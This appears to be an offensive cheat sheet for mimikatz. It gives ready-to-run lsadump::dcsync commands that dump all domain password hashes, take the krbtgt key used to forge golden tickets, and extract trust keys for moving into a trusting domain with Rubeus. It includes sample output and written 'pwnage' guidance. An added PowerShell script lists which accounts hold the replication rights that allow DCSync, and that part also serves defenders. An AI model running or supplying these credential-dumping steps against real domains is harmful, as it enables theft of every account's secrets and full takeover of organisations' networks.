mimikatz.exe
A little tool to play with Windows security.
Get ready to work with mimikatz
Before running mimikatz, launch a command prompt with admin rights, then:
mimikatz.exe
privilege::debug
privilege::debug asks for SeDebugPrivilege so mimikatz can open LSASS on the local box. The lsadump::dcsync commands below do not need it: they ask a domain controller to replicate the data over the directory replication protocol, so what matters there is the domain account you run as, not local privileges.
Extract all hashes from a domain controller (when you have DA rights, or any account that holds the replication extended rights DS-Replication-Get-Changes and DS-Replication-Get-Changes-All on the domain)
lsadump::dcsync /domain:domain.com /all /csv
Extract the hashes of a single user (krbtgt here; its key is what a golden ticket is forged with)
lsadump::dcsync /domain:domain.com /user:krbtgt
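A check that goes with the replication-rights point above, added here as an example and not something from the original page: a PowerShell script that lists every principal holding the replication extended rights on the domain head, which is the set of accounts that can run lsadump::dcsync against it. It assumes the ActiveDirectory RSAT module and the AD: drive it registers are available; the right GUIDs are the well-known ones, and nothing else is taken from the page.

```powershell
# Added example, not from the original page: who can DCSync this domain?
# Lists principals holding the replication extended rights on the domain head.
# Assumes the ActiveDirectory module (RSAT) and the AD: drive it registers.
Import-Module ActiveDirectory

$domainDn = (Get-ADDomain).DistinguishedName   # add -Identity domain.com for another domain

# Well-known GUIDs of the extended rights that together permit replication of secrets
$replRights = @{
    '1131f6aa-9c07-11d1-f79f-00c04fc2dcd2' = 'DS-Replication-Get-Changes'
    '1131f6ad-9c07-11d1-f79f-00c04fc2dcd2' = 'DS-Replication-Get-Changes-All'
    '89e95b76-444d-4c62-991a-0facbeda640c' = 'DS-Replication-Get-Changes-In-Filtered-Set'
}
$allRightsGuid = '00000000-0000-0000-0000-000000000000'   # ObjectType meaning "every extended right"

$holders = foreach ($ace in (Get-Acl -Path "AD:\$domainDn").Access) {
    if ($ace.AccessControlType -ne 'Allow') { continue }
    $rights = $ace.ActiveDirectoryRights.ToString()
    $type   = $ace.ObjectType.ToString()

    if ($rights -match 'GenericAll' -or ($rights -match 'ExtendedRight' -and $type -eq $allRightsGuid)) {
        # Full control, or all extended rights at once, covers DCSync as well
        $name = 'All extended rights'
    } elseif ($rights -match 'ExtendedRight' -and $replRights.ContainsKey($type)) {
        $name = $replRights[$type]
    } else {
        continue
    }
    [pscustomobject]@{
        Principal = $ace.IdentityReference.Value
        Right     = $name
        Inherited = $ace.IsInherited
    }
}

# Replicating password data needs Get-Changes AND Get-Changes-All (or everything)
$canDcsync = $holders | Group-Object Principal | Where-Object {
    $r = $_.Group.Right
    ($r -contains 'All extended rights') -or
    (($r -contains 'DS-Replication-Get-Changes') -and ($r -contains 'DS-Replication-Get-Changes-All'))
} | Select-Object -ExpandProperty Name

$holders | Sort-Object Principal, Right | Format-Table -AutoSize
"Principals able to DCSync: " + ($canDcsync -join ', ')
```

Run it as any domain user (reading the domain ACL needs no special rights). Expect the domain controller groups, Administrators and SYSTEM in the final list; any other principal there is effectively a domain admin and is worth explaining, whether you are the attacker looking for a softer target or the defender cleaning up.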
Extract domain trust keys
For example, if you have pwn3d domain2.com and want the trust keys it shares with domain1.com, first look up the objectGUID of the trustedDomain object for domain1.com (it lives under CN=System in domain2.com's directory), and then you can do this from a mimikatz prompt running as an account with replication rights in domain2.com:
lsadump::dcsync /domain:domain2.com /guid:{xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx}
The output will look something like (trimmed):
<snip>
[OUT] DOMAIN1.COM -> DOMAIN2.COM
* 1/1/2024 7:11 a.m. - CLEAR - <snip>
aes256_hmac: BLAHBLAH
aes128_hmac: BLAHBLAH
rc4_hmac_nt: IMPORTANT!
<snip>
Take the rc4_hmac_nt value (that is the trust key, the shared secret that protects tickets referred across the trust) and then use it with Rubeus to get a TGT for DOMAIN1.COM. Two things to keep in mind: the [In] and [Out] key sets are different keys, so take the one for the direction you are crossing, and trust keys rotate on their own (every 30 days by default), so a key you dumped a while ago may no longer work.
More good stuff about abusing domain trusts here, and I found this example to be excellent for walking you through a pwnage situation where you've got DA on DOMAIN2.COM and want to pwn DOMAIN1.COM via a trust relationship.